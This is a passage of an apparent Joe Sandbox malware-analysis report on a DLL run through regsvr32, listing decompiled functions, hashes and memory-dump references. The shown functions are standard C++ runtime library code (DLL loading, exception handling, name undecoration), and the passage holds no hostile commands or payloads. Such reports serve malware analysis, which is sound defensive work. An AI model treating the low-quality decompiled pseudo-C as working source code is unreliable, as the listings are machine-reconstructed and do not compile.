                                                                                                              • API ID: FileModuleName_set_error_mode
                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                              • API String ID: 3581924421-4022980321
                                                                                                              • Opcode ID: 1c5d91d59597b8fa4821d8630b7b7a44c75af290db469db1aaf4132d35bbc8b4
                                                                                                              • Instruction ID: 762a9bb0a511f039f0861ad2b303dfe2c2015d566524bac6263f4973912dccb4
                                                                                                              • Opcode Fuzzy Hash: 1c5d91d59597b8fa4821d8630b7b7a44c75af290db469db1aaf4132d35bbc8b4
                                                                                                              • Instruction Fuzzy Hash: CD31E531300A4985FBE6DB22A8103EA6395B75CBE4F408516FE29576E2DF3AC34ED340
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800075F0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+Replicator::operator[]
                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                              • API String ID: 1405650943-2211150622
                                                                                                              • Opcode ID: 526beb1de9b9a89500194560d209e67ede989f34fd14310184bc8e08c1948548
                                                                                                              • Instruction ID: 3940e1c7961a8756ce07a1ce5fc210870e384cea1037f1338f32cd2f2e97112f
                                                                                                              • Opcode Fuzzy Hash: 526beb1de9b9a89500194560d209e67ede989f34fd14310184bc8e08c1948548
                                                                                                              • Instruction Fuzzy Hash: FB411772A04B488DF792CF28D8813EC37A0A31CB88F54C115EA8D567A6DF3D8788C750
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180009494 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: char $int $long $short $unsigned
                                                                                                              • API String ID: 2943138195-3894466517
                                                                                                              • Opcode ID: 6a4821efb2c9af6ea9600bc8990059f8bc6018e250c812de8fdce70b6f823f03
                                                                                                              • Instruction ID: aaf29c4696f27858034d4480bd3930af9bff89b9934b91e94dbcc25456c4fbb3
                                                                                                              • Opcode Fuzzy Hash: 6a4821efb2c9af6ea9600bc8990059f8bc6018e250c812de8fdce70b6f823f03
                                                                                                              • Instruction Fuzzy Hash: 2B415672A15A5889FB93CFA9E8543ED37B1A30DB89F44C111EA4816B99DF39C74CC700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046C24 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$ErrorFreeLast
                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                              • API String ID: 3813093105-537541572
                                                                                                              • Opcode ID: 0455f011cf15a5e51da70892be0e0c6ebb1809833f425680f1eaf303684194c8
                                                                                                              • Instruction ID: ddca8f0cf56a5ebca5640a13208f8e6a83883affbebce22e42bd408b9b5217b5
                                                                                                              • Opcode Fuzzy Hash: 0455f011cf15a5e51da70892be0e0c6ebb1809833f425680f1eaf303684194c8
                                                                                                              • Instruction Fuzzy Hash: 4121A531B01E0850EEA6CB16A8803E522A5FB4CBF4F19C221FD69467E0EE39C6498345
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046EF8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 16%
                                                                                                              			E00000001180046EF8(void* __ecx, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t32;
				void* _t47;
				intOrPtr _t48;
				signed long long _t49;
				signed long long _t53;
				void* _t75;
				void* _t78;
				struct HINSTANCE__* _t79;

				_t47 = _t75;
				 *((long long*)(_t47 + 8)) = __rbx;
				 *((long long*)(_t47 + 0x10)) = __rbp;
				 *((long long*)(_t47 + 0x18)) = __rsi;
				 *((long long*)(_t47 + 0x20)) = __rdi;
				_t48 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rdi * 8));
				if (_t48 == 0) goto 0x80046f39;
				_t49 =  ==  ? __rbp : _t48;
				goto 0x80046fd6;
				r8d = 0x800;
				LoadLibraryExW(??, ??, ??);
				if (_t49 != 0) goto 0x80046faa;
				if (GetLastError() != 0x57) goto 0x80046fc8;
				_t12 = _t49 - 0x50; // -80
				_t32 = _t12;
				r8d = _t32;
				if (E0000000118003C5E8(_t78) == 0) goto 0x80046fc8;
				r8d = _t32;
				if (E0000000118003C5E8(_t78) == 0) goto 0x80046fc8;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t53 = _t49;
				if (_t49 == 0) goto 0x80046fc8;
				_t13 = 0x180000000 + 0x71ef0 + __rdi * 8;
				 *_t13 = _t53;
				if ( *_t13 == 0) goto 0x80046fc3;
				FreeLibrary(_t79);
				goto 0x80046fd6;
				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rdi * 8)) = _t53 | 0xffffffff;
				return 0;
			}











                                                                                                              0x180046ef8
                                                                                                              0x180046efb
                                                                                                              0x180046eff
                                                                                                              0x180046f03
                                                                                                              0x180046f07
                                                                                                              0x180046f1a
                                                                                                              0x180046f27
                                                                                                              0x180046f30
                                                                                                              0x180046f34
                                                                                                              0x180046f46
                                                                                                              0x180046f4c
                                                                                                              0x180046f58
                                                                                                              0x180046f63
                                                                                                              0x180046f65
                                                                                                              0x180046f65
                                                                                                              0x180046f6b
                                                                                                              0x180046f7c
                                                                                                              0x180046f7e
                                                                                                              0x180046f92
                                                                                                              0x180046f94
                                                                                                              0x180046f9c
                                                                                                              0x180046fa2
                                                                                                              0x180046fa8
                                                                                                              0x180046fad
                                                                                                              0x180046fad
                                                                                                              0x180046fb8
                                                                                                              0x180046fbd
                                                                                                              0x180046fc6
                                                                                                              0x180046fcc
                                                                                                              0x180046ff0

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$ErrorFreeLast
                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                              • API String ID: 3813093105-537541572
                                                                                                              • Opcode ID: 8e15efe103d8296b82805be40b0246a6c3adf41aac86677863ffddf345a2a075
                                                                                                              • Instruction ID: 26a99d0d03aca699e0534a0c9db9b2c9d6b87e10489885b8d46de4b8d2eaf0e0
                                                                                                              • Opcode Fuzzy Hash: 8e15efe103d8296b82805be40b0246a6c3adf41aac86677863ffddf345a2a075
                                                                                                              • Instruction Fuzzy Hash: 3321F332711F1880FAA2CB16A4407D82790BB4CBF4F598226FE6943BE0EF38D20D8305
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003CE34 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 2506987500-0
                                                                                                              • Opcode ID: f979c3ec5602c8924af38e8e1b98035285f747c8c277c31ef552c09f97942387
                                                                                                              • Instruction ID: e93966b15778256aea926fc40fcab3a896feee927149e159ff148a0df1a0fe12
                                                                                                              • Opcode Fuzzy Hash: f979c3ec5602c8924af38e8e1b98035285f747c8c277c31ef552c09f97942387
                                                                                                              • Instruction Fuzzy Hash: A3117F3030464C45FAEBA33595857FB63426B8C7F4F16C725B876867C7DE2986498301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001088C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 316COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 55%
                                                                                                              			E0000000118001088C(void* __eax, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t156;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t177;
				intOrPtr _t192;
				intOrPtr _t197;
				void* _t198;
				signed long long _t236;
				signed long long _t237;
				signed char _t238;
				intOrPtr* _t240;
				long long _t242;
				long long _t250;
				intOrPtr* _t252;
				intOrPtr* _t266;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				signed long long _t291;
				long long _t300;
				long long _t301;
				intOrPtr* _t302;
				long long _t310;
				signed char* _t313;
				intOrPtr _t318;

				_t289 = _t290 - 0x88;
				_t291 = _t290 - 0x188;
				_t236 =  *0x80070098; // 0xde2ac6aee6eb
				_t237 = _t236 ^ _t291;
				 *(_t289 + 0x70) = _t237;
				_t313 =  *((intOrPtr*)(_t289 + 0xf0));
				 *((long long*)(_t291 + 0x78)) = __rdx;
				 *((long long*)(_t289 - 0x60)) =  *((intOrPtr*)(_t289 + 0x108));
				_t288 = __r9;
				 *((char*)(_t291 + 0x60)) = 0;
				0x8000fb20();
				if ( *((intOrPtr*)(__r9 + 0x48)) == 0) goto 0x80010908;
				E0000000118000E0F4(_t237);
				if ( *((intOrPtr*)(_t237 + 0x78)) != 0xfffffffe) goto 0x80010d81;
				goto 0x80010927;
				E0000000118000E0F4(_t237);
				if ( *((intOrPtr*)(_t237 + 0x78)) == 0xfffffffe) goto 0x80010927;
				E0000000118000E0F4(_t237);
				_t197 =  *((intOrPtr*)(_t237 + 0x78));
				E0000000118000E0F4(_t237);
				 *((intOrPtr*)(_t237 + 0x78)) = 0xfffffffe;
				if (_t197 - 0xffffffff < 0) goto 0x80010d81;
				if (_t313[8] == 0) goto 0x80010967;
				_t238 = _t313[0x18005f7b0];
				goto 0x80010969;
				if (_t197 >= 0) goto 0x80010d81;
				if ( *__rcx != 0xe06d7363) goto 0x80010a41;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x80010a41;
				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x80010a41;
				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x80010a41;
				E0000000118000E0F4(_t238);
				if ( *((long long*)(_t238 + 0x20)) == 0) goto 0x80010d1f;
				E0000000118000E0F4(_t238);
				_t252 =  *((intOrPtr*)(_t238 + 0x20));
				E0000000118000E0F4(_t238);
				 *((char*)(_t291 + 0x60)) = 1;
				E0000000118000F21C(_t238,  *((intOrPtr*)(_t252 + 0x38)));
				if ( *_t252 != 0xe06d7363) goto 0x800109f9;
				if ( *((intOrPtr*)(_t252 + 0x18)) != 4) goto 0x800109f9;
				if ( *((intOrPtr*)(_t252 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800109f9;
				if ( *((long long*)(_t252 + 0x30)) == 0) goto 0x80010d81;
				E0000000118000E0F4(_t238);
				if ( *(_t238 + 0x38) == 0) goto 0x80010a41;
				E0000000118000E0F4(_t238);
				E0000000118000E0F4(_t238);
				 *(_t238 + 0x38) =  *(_t238 + 0x38) & 0x00000000;
				if (E00000001180012A90(_t238, _t252, _t252,  *(_t238 + 0x38), __r9) != 0) goto 0x80010a3c;
				if (E00000001180012B80(_t238, _t252,  *(_t238 + 0x38), __r9, _t289) == 0) goto 0x80010d63;
				goto 0x80010d3f;
				0x80011a88();
				if ( *_t252 != 0xe06d7363) goto 0x80010cd7;
				if ( *((intOrPtr*)(_t252 + 0x18)) != 4) goto 0x80010cd7;
				if ( *((intOrPtr*)(_t252 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80010cd7;
				if ( *((intOrPtr*)(_t289 - 0x10)) <= 0) goto 0x80010cbc;
				 *((intOrPtr*)(_t291 + 0x28)) =  *((intOrPtr*)(_t289 + 0x100));
				 *(_t291 + 0x20) = _t313;
				r8d = _t197;
				_t156 = E0000000118000EB9C(_t252, _t289 - 0x58, _t289 - 0x10, _t287, __r9, _t289);
				asm("movups xmm0, [ebp-0x58]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t156 -  *((intOrPtr*)(_t289 - 0x40)) >= 0) goto 0x80010cbc;
				_t157 =  *((intOrPtr*)(_t289 - 0x70));
				 *((long long*)(_t289 - 0x80)) =  *((intOrPtr*)(_t289 - 0x58));
				 *((intOrPtr*)(_t291 + 0x68)) = _t157;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x78], xmm0");
				if (_t157 - _t197 > 0) goto 0x80010c17;
				if (_t197 - _t157 > 0) goto 0x80010c17;
				_t240 =  *((intOrPtr*)(__r9 + 0x10));
				r9d =  *_t240;
				0x800119e0();
				_t158 =  *((intOrPtr*)(_t289 + 0x20));
				r12d = 0;
				 *((intOrPtr*)(_t291 + 0x64)) = r12d;
				 *((intOrPtr*)(_t291 + 0x6c)) = _t158;
				if (_t158 == 0) goto 0x80010c17;
				asm("movups xmm0, [ebp+0x38]");
				asm("movups xmm1, [ebp+0x48]");
				asm("movups [ebp-0x38], xmm0");
				asm("movsd xmm0, [ebp+0x58]");
				asm("movsd [ebp-0x18], xmm0");
				asm("movups [ebp-0x28], xmm1");
				E0000000118000F1F0(_t240);
				_t242 = _t240 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30)) + 0xc));
				 *((long long*)(_t291 + 0x70)) = _t242;
				E0000000118000F1F0(_t242);
				r15d =  *((intOrPtr*)(_t242 +  *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30)) + 0xc))));
				if (r15d <= 0) goto 0x80010ba2;
				E0000000118000F1F0(_t242);
				_t310 = _t242 +  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x70))));
				if (E000000011800113D0(_t198, _t252, _t289 - 0x38, _t310, _t287, __r9,  *((intOrPtr*)(_t252 + 0x30))) != 0) goto 0x80010bbf;
				 *((long long*)(_t291 + 0x70)) =  *((long long*)(_t291 + 0x70)) + 4;
				r15d = r15d - 1;
				if (r15d > 0) goto 0x80010b68;
				r12d =  *((intOrPtr*)(_t291 + 0x64));
				E000000011800122A4( *((intOrPtr*)(_t291 + 0x70)), _t289 + 0x20);
				r12d = r12d + 1;
				 *((intOrPtr*)(_t291 + 0x64)) = r12d;
				if (r12d ==  *((intOrPtr*)(_t291 + 0x6c))) goto 0x80010c13;
				goto 0x80010b1f;
				 *((char*)(_t291 + 0x58)) =  *((intOrPtr*)(_t289 + 0xf8));
				_t266 = _t252;
				 *((char*)(_t291 + 0x50)) =  *((intOrPtr*)(_t291 + 0x60));
				 *((long long*)(_t291 + 0x48)) =  *((intOrPtr*)(_t289 - 0x60));
				 *((intOrPtr*)(_t291 + 0x40)) =  *((intOrPtr*)(_t289 + 0x100));
				 *((long long*)(_t291 + 0x38)) = _t289 - 0x78;
				 *((long long*)(_t291 + 0x30)) = _t310;
				 *((long long*)(_t291 + 0x28)) = _t289 - 0x38;
				 *(_t291 + 0x20) = _t313;
				E000000011800102F0(_t313[0x18005f7c0], _t252, _t266,  *((intOrPtr*)(_t291 + 0x78)),  *((intOrPtr*)(_t238 + 0x28)), _t288);
				_t318 =  *((intOrPtr*)(_t289 - 0x80));
				_t300 =  *((intOrPtr*)(_t318 + 8)) -  *((char*)(_t266 + 0x18005f7b0));
				 *((long long*)(_t318 + 8)) = _t300;
				 *(_t318 + 0x18) =  *(_t300 - 4) >>  *(_t266 + 0x18005f7c0);
				_t301 = _t300 -  *((char*)(_t266 + 0x18005f7b0));
				 *((long long*)(_t318 + 8)) = _t301;
				 *(_t318 + 0x1c) =  *(_t301 - 4) >>  *(_t266 + 0x18005f7c0);
				_t302 = _t301 -  *((char*)(_t266 + 0x18005f7b0));
				 *(_t318 + 0x20) =  *(_t302 - 4) >>  *(_t266 + 0x18005f7c0);
				_t192 =  *((intOrPtr*)(_t291 + 0x68)) + 1;
				 *((long long*)(_t318 + 8)) = _t302;
				_t116 = _t302 + 4; // 0x4
				_t250 = _t116;
				 *((long long*)(_t318 + 8)) = _t250;
				 *((intOrPtr*)(_t318 + 0x24)) =  *_t302;
				 *((intOrPtr*)(_t291 + 0x68)) = _t192;
				if (_t192 -  *((intOrPtr*)(_t289 - 0x40)) < 0) goto 0x80010ace;
				if (( *_t313 & 0x00000040) == 0) goto 0x80010d13;
				if (E0000000118000E8CC(_t313) == 0) goto 0x80010d69;
				goto 0x80010d13;
				if ( *((intOrPtr*)(_t289 - 0x10)) <= 0) goto 0x80010d13;
				if ( *((char*)(_t289 + 0xf8)) != 0) goto 0x80010d81;
				 *((long long*)(_t291 + 0x38)) = _t310;
				 *((intOrPtr*)(_t291 + 0x30)) =  *((intOrPtr*)(_t289 + 0x100));
				 *((intOrPtr*)(_t291 + 0x28)) = _t197;
				 *(_t291 + 0x20) = _t313;
				E00000001180010FA0( *_t302, _t252, _t318,  *((intOrPtr*)(_t238 + 0x28)), _t288);
				_t177 = E0000000118000E0F4(_t250);
				if ( *((long long*)(_t250 + 0x38)) != 0) goto 0x80010d81;
				return E000000011800028F0(_t177, _t192,  *(_t289 + 0x70) ^ _t291);
			}

































                                                                                                              0x180010899
                                                                                                              0x1800108a1
                                                                                                              0x1800108a8
                                                                                                              0x1800108af
                                                                                                              0x1800108b2
                                                                                                              0x1800108b6
                                                                                                              0x1800108ca
                                                                                                              0x1800108d5
                                                                                                              0x1800108d9
                                                                                                              0x1800108dc
                                                                                                              0x1800108e4
                                                                                                              0x1800108ef
                                                                                                              0x1800108f1
                                                                                                              0x1800108fa
                                                                                                              0x180010906
                                                                                                              0x180010908
                                                                                                              0x180010911
                                                                                                              0x180010913
                                                                                                              0x180010918
                                                                                                              0x18001091b
                                                                                                              0x180010920
                                                                                                              0x18001092a
                                                                                                              0x18001093c
                                                                                                              0x18001094c
                                                                                                              0x180010965
                                                                                                              0x18001096b
                                                                                                              0x180010977
                                                                                                              0x180010981
                                                                                                              0x180010992
                                                                                                              0x18001099d
                                                                                                              0x1800109a3
                                                                                                              0x1800109ad
                                                                                                              0x1800109b3
                                                                                                              0x1800109b8
                                                                                                              0x1800109bc
                                                                                                              0x1800109c5
                                                                                                              0x1800109ce
                                                                                                              0x1800109d9
                                                                                                              0x1800109df
                                                                                                              0x1800109ec
                                                                                                              0x1800109f3
                                                                                                              0x1800109f9
                                                                                                              0x180010a03
                                                                                                              0x180010a05
                                                                                                              0x180010a0e
                                                                                                              0x180010a19
                                                                                                              0x180010a25
                                                                                                              0x180010a31
                                                                                                              0x180010a37
                                                                                                              0x180010a4c
                                                                                                              0x180010a57
                                                                                                              0x180010a61
                                                                                                              0x180010a72
                                                                                                              0x180010a7c
                                                                                                              0x180010a8c
                                                                                                              0x180010a97
                                                                                                              0x180010a9c
                                                                                                              0x180010a9f
                                                                                                              0x180010aa4
                                                                                                              0x180010aa8
                                                                                                              0x180010aad
                                                                                                              0x180010ab2
                                                                                                              0x180010ab9
                                                                                                              0x180010ac3
                                                                                                              0x180010ac6
                                                                                                              0x180010aca
                                                                                                              0x180010ace
                                                                                                              0x180010ad3
                                                                                                              0x180010ad8
                                                                                                              0x180010ade
                                                                                                              0x180010aea
                                                                                                              0x180010af0
                                                                                                              0x180010b00
                                                                                                              0x180010b03
                                                                                                              0x180010b08
                                                                                                              0x180010b0b
                                                                                                              0x180010b0e
                                                                                                              0x180010b13
                                                                                                              0x180010b19
                                                                                                              0x180010b1f
                                                                                                              0x180010b23
                                                                                                              0x180010b27
                                                                                                              0x180010b2b
                                                                                                              0x180010b30
                                                                                                              0x180010b35
                                                                                                              0x180010b39
                                                                                                              0x180010b4a
                                                                                                              0x180010b4d
                                                                                                              0x180010b52
                                                                                                              0x180010b5f
                                                                                                              0x180010b66
                                                                                                              0x180010b68
                                                                                                              0x180010b7c
                                                                                                              0x180010b8d
                                                                                                              0x180010b8f
                                                                                                              0x180010b95
                                                                                                              0x180010b9b
                                                                                                              0x180010b9d
                                                                                                              0x180010ba6
                                                                                                              0x180010bab
                                                                                                              0x180010bae
                                                                                                              0x180010bb8
                                                                                                              0x180010bba
                                                                                                              0x180010bd0
                                                                                                              0x180010bd4
                                                                                                              0x180010bdb
                                                                                                              0x180010be3
                                                                                                              0x180010bee
                                                                                                              0x180010bf6
                                                                                                              0x180010bff
                                                                                                              0x180010c04
                                                                                                              0x180010c09
                                                                                                              0x180010c0e
                                                                                                              0x180010c13
                                                                                                              0x180010c39
                                                                                                              0x180010c42
                                                                                                              0x180010c46
                                                                                                              0x180010c61
                                                                                                              0x180010c6a
                                                                                                              0x180010c6e
                                                                                                              0x180010c89
                                                                                                              0x180010c96
                                                                                                              0x180010c9a
                                                                                                              0x180010c9c
                                                                                                              0x180010ca0
                                                                                                              0x180010ca0
                                                                                                              0x180010ca7
                                                                                                              0x180010cab
                                                                                                              0x180010caf
                                                                                                              0x180010cb6
                                                                                                              0x180010cc0
                                                                                                              0x180010ccf
                                                                                                              0x180010cd5
                                                                                                              0x180010cdb
                                                                                                              0x180010ce4
                                                                                                              0x180010cf3
                                                                                                              0x180010cfb
                                                                                                              0x180010d02
                                                                                                              0x180010d09
                                                                                                              0x180010d0e
                                                                                                              0x180010d13
                                                                                                              0x180010d1d
                                                                                                              0x180010d3e

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 3523768491-393685449
                                                                                                              • Opcode ID: 17c3c5d3a4765e50826e8cd48088b8634263427cdc0f4d9d977d1f04e9d222ad
                                                                                                              • Instruction ID: ffa1068e39424c2b3d8ce22294ed4230536d233261888c7350d378388e4547db
                                                                                                              • Opcode Fuzzy Hash: 17c3c5d3a4765e50826e8cd48088b8634263427cdc0f4d9d977d1f04e9d222ad
                                                                                                              • Instruction Fuzzy Hash: FCE1B273604B888AE7A2DF74D4803ED7BA0F349788F248215EE8857B96DF74C689C740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000AD48 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                              • API String ID: 2943138195-757766384
                                                                                                              • Opcode ID: d7102d268205a3051dce0296ed17165e122f3928336c0fb775b07ef3e211eede
                                                                                                              • Instruction ID: 540a8241286d6388e21660baafdc136502b0263646abc12b3d3d1da7efe147e0
                                                                                                              • Opcode Fuzzy Hash: d7102d268205a3051dce0296ed17165e122f3928336c0fb775b07ef3e211eede
                                                                                                              • Instruction Fuzzy Hash: 097139B2608B4888FB96CB68D8913EC77A5B70E7C5F54C526EA4A53B95DF39C358C300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000CA30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
